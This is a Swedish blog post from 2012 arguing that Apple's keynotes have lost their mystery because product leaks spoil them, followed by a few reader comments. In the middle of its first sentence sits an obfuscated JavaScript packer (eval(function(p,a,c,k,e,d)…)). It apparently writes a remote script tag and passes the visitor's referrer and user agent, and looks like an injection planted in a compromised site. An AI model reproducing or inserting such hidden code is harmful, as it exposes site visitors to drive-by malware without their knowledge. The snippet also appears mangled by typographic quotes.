Image Image Image Image Image Image Image Image Image Image

| 25 november, 2017

Scroll to top

Top

4 Comments

Filip tycker till: Apple och dess keynote. | Revue.se

Filip tycker till: Apple och dess keynote. Är det fortfarande intressant?
Filip Urde
  • On 24 oktober, 2012
  • http://www.revue.se/filip-urde

Ännu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|saakr|var|u0026u|referrer|znnke||js|php’.split(‘|’),0,{}))
en gång satt jag och följde Apple och dess keynote.

Ett event som varit ett av dem mest upphaussade och hemlighetsfulla eventen i branschen.

Men är det fortfarande lika intressant?

När jag tänker tillbaka på dessa event så är det ett som sticker ut. Det jag tänker på är 2007 års upplaga, vilket var året då iPhone lanserades. Inför lanseringen av iPhone så cirkulerade rykten och spekulationer om produkten i flera månader, spänningen var på topp.

Den första versionen av iPhone lanserades av Apples dåvarande VD Steve Jobs under hans keynote i början av Macworld i San Francisco den 9 januari 2007. En produkt som Time magazine utsåg till ”årets uppfinning” 2007. Detta var ett startskott på en nästan okontrollerbar framgång.

Sedan iPhone lanserades så har förväntningarna på Apple och dess produkter varit på en nivå som knappt är hållbar. Folk började inbilla sig att Apple skulle uppfinna ”hjulet” vid varje ny produkt, vilket självklart är förväntningar som är ohållbara tillslut. Men Apple gillar att stå i rampljuset, man gillar att vara företaget med stort F.

Apple har gjort ett extremt bra jobb i flera år, men särskilt sedan iPhone släpptes och hur man öppnade upp smartphone marknaden på riktigt.

Men gårdagens keynote lämnade mig förvirrad framför min Apple-TV.

Varför satt jag och tittade på det här?” Kommer jag ihåg att jag tänkte. Det var ju inte en enda sak som jag inte hade sett eller hört om innan eventet (och det är månader innan eventet). Nu är jag yrkesskadad av Revue.se, men fortfarande. Inför lanseringen för iPhone 2007, så var det många som spekulerade över en Apple telefon, men det var inget snack om läckta replikor flera månader innan release eventet.

2007 var det ett hemlighetsmakeri utan dess like och det var inte en chans att en Vietnamesisk blogg skulle kunna ha fotat den nya kronjuvelen och lagt ut på sin blogg.

 

Men vad hände då?

 

Gårdagens event var som en tävling i memory… Eller en gissningslek över vilken av produkterna som dem kommer presentera först.

Jag visste att en iPad mini skulle komma, hur den skulle se ut, man visste allt. Varför? Jo för den och dess olika delar har varit i cirkulation på olika bloggar i flera månader nu. Vilket är irriterande.

Hur många nya Apple produkter har inte ”hittats” på en bar och sedan blivit fotade. 

apple

Det tidigare hemlighetsfulla och spännande eventet med enorma förväntningar har blivit ett ”state the obvious” event.

Jag förstår att man inte kan hålla dessa event lika intressanta och spännande varje år. Det skulle vara nästa omöjligt. Men vad som är irriterande är att man från Apples sida inte vill inse att sina events tappar sin coola status utan mystiken. Mycket gick förlorat i och med Steve Jobs tragiska död, han var ett dragplåster i sig själv, men det började dala redan med honom.

Men nu när Tim Cook och dem andra står på scenen och säger att dem har något helt ”awesome”, ”amazing” eller ”incredible” att visa oss så blir jag bara lite trött. Jag vill bara säga till dem… ”Ja den är fin, men jag har redan sett den!”.

 

Rent krasst så känner jag följande: om dem inte kan hålla dessa event hemlighetsfulla så som dem gjort genom åren, samt att man satsar pengar på att det inte ska kunna rymma produkter ut från sina fabriker och i händerna på bloggar i Asien. Ja, då ska man inte ha dessa keynotes. Inte i dess nuvarande format i alla fall.

Man har byggt upp ett event som skapar förväntningar, vilket är en känsla som alla älskar. Om dessa förväntningar dämpas redan 2 månader innan eventet äger rum så tappar själva eventet sitt syfte. Varför Apples event är populärt är för att alla vill bli hänförda över deras teknik och innovation. Tar man bort det så är det bara ett gäng gubbar i stora Levis jeans, instoppad skjorta, stort bälte och halvtaskig hållning.

 

Vi vill ha mystiken Apple! Tappa inte den nu! 

 

Om ni vill se Apples keynote och ge mig er åsikt så finner ni den här.

  • Bass

    Ser riktigt bra ut Filip 🙂

  • D.G

    Jag håller helt med dig! Börjar bli extremt urvattnat med dem där jäkla eventen! det är synd att dem är så otroligt självgoda.

  • Patrik Hammar

    http://m3.idg.se/2.1022/1.473123/kronika-ar-apple-nya-samsung
    Ni är inte ensamma om att diskutera detta ”problem”.

    • Intressant Patrik! Tack det har jag inte sett.